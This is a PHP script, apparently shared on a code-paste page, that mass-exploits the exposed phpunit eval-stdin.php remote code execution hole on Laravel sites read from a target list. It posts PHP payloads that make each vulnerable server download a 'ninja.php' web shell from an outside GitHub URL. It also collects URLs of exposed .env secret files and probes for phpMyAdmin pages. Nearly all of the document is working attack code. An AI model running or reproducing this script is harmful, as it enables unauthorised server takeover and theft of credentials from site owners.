laravel eval stdin exploiter & env checker
<?php | |
error_reporting(0); | |
#LARAVEL EXPLOITER v1# | |
# BY FB/www.zeldin.go.id [ SECURITY GHOST ] # | |
define("SAVED_FILE", "envscanner".uniqid().".txt"); | |
function test($site, $test = 1){ | |
switch($test){ | |
case 1 : | |
$postFields = "<?php echo('vuln'); ?>"; | |
break; | |
case 2 : | |
$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>"; | |
break; | |
case 3 : | |
$postFields = "<?php file_put_contents('ninja.php', 'https://raw.githubusercontent.com/rintod/ninja/master/ninja.php'); ?>"; | |
break; | |
default : | |
$postFields = "<?php copy('https://raw.githubusercontent.com/rintod/ninja/master/ninja.php', 'ninja.php'); ?>"; | |
break; | |
} | |
$ch = curl_init(); | |
$options = array( | |
CURLOPT_URL => $site, | |
CURLOPT_RETURNTRANSFER => true, | |
CURLOPT_POST => true, | |
CURLOPT_POSTFIELDS => $postFields, | |
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0", | |
CURLOPT_SSL_VERIFYPEER => false, | |
CURLOPT_SSL_VERIFYHOST => false, | |
CURLOPT_CONNECTTIMEOUT => 7, | |
CURLOPT_TIMEOUT => 7 | |
); | |
curl_setopt_array($ch, $options); | |
return curl_exec($ch); | |
} | |
function get_http_response_code($domain1) { | |
$headers = get_headers($domain1); | |
return substr($headers[0], 9, 3); | |
} | |
function env($site){ | |
preg_match('#(.*)vendor#si', $site, $url); | |
$check = get_http_response_code($url[1].".env"); | |
return $check; | |
} | |
function uri($site){ | |
preg_match('#(.*?)vendor#si', $site, $url); | |
return $url; | |
} | |
echo "# LIST : "; $flist = trim(fgets(STDIN)); | |
if(!is_file($flist) || !file_exists($flist)){ | |
die("No url file list\n"); | |
} | |
$list = explode("\r\n", file_get_contents($flist)); | |
foreach($list as $key => $target){ | |
if(strlen($target) > 0 && strpos($target, 'vendor')){ | |
$site = explode('/', $target)[2]; | |
echo ">>>>>>>>>> START [ ".$key." ] EXPLOITER <<<<<<<<<\n"; | |
echo "\t>> TARGET : ".$site."\n"; | |
echo "\t>> SCANNING TARGET HAS AN RCE FILE OR NOT : "; | |
if(get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php") == 200){ | |
echo "{!} RCE FILE AVAILABLE {!}\n"; | |
echo "\t{!} START TESTING {!} \n"; | |
sleep(2); | |
echo "\t>> TESTING VULN MESSAGE\n"; | |
echo "\t>> RESULT : "; | |
if(test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 1) == "vuln"){ | |
echo "VULN\n"; | |
echo "\t>> SITE SHELL CHECK : ".uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php"."\n"; | |
echo "\t>> TESTING WITH COPY EXTENSION WEBSHELL & CHECK\n"; | |
test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 2); | |
echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n"; | |
echo "\t>> TESTING WITH FILE PUT CONTENTS FUNCTION & CHECK\n"; | |
test(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/eval-stdin.php", 3); | |
echo "\t>> HTTP CODE : ".get_http_response_code(uri($target)[0]."/phpunit/phpunit/src/Util/PHP/ninja.php")."\n"; | |
}else{ | |
echo "NOT VULN\n"; | |
} | |
}else{ | |
echo "{~} RCE FILE NOT AVAILABLE {~}\n"; | |
} | |
echo "\t>> CHECK HAS A ENV FILE OR NOT\n"; | |
preg_match('#(.*)vendor#si', $target, $url); | |
echo "\t>> ENV CHECK URL : ".$url[1].".env\n"; | |
echo "\t>> RESULT : "; | |
if(env($target) == "200"){ | |
file_put_contents(SAVED_FILE, $url[1].".env\n", FILE_APPEND); | |
echo $site." [ HAS ENV ]\n"; | |
echo "\t>> CHECK PHPMYADMIN PAGE : "; | |
echo get_http_response_code("http://".$site."/phpmyadmin/") == "200" ? "HAS PHPMYADMIN PAGE\n" : "PHPMYADMIN PAGE NOT FOUND\n"; | |
}else{ | |
echo $site." [ ENV NOT FOUND ]\n"; | |
} | |
echo ">>>>>>>>>>>>>>>>>>> DONE <<<<<<<<<<<<<<<<<<<\n\n"; | |
}else{ | |
$site = explode('/', $target)[2]; | |
echo ">> SKIPPING SITE : ".$site." ~ REASON : VENDOR URL NOT DETECTED.\n"; | |
} | |
sleep(1); | |
} | |
?> |